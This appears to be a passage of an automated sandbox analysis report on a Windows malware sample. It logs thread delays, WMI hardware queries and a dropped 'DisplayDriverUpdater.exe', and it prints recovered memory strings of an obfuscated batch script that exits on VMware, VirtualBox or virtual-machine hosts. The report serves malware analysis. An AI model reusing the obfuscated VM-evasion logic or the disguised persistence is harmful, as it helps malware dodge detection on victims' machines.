Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7836	Thread sleep time: -599030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7496	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep count: 4824 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep count: 5026 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044	Thread sleep count: 7188 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3084	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep count: 2502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep time: -592250s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep time: -589318s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep count: 6609 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep count: 1261 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180	Thread sleep count: 7445 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348	Thread sleep count: 2272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep count: 31 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -591506s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -591334s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -591209s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -591084s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484	Thread sleep count: 7300 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep count: 698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3672	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe TID: 6472	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe TID: 6472	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\ReAgentc.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product, SerialNumber FROM Win32_BaseBoard WHERE Status = 'OK'

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599498	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599369	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599137	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\Desktop\spreadmalware.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 592250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 589318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 591084
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData

Source: cmd.exe, 0000000B.00000003.1433377082.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=o=
Source: cmd.exe, 0000000B.00000003.1423336848.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1433229188.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lwindir=C:\Windowsx=my=nz=oy
Source: cmd.exe, 0000000B.00000003.1433564326.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=o
Source: cmd.exe, 0000000B.00000003.1426601427.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o0
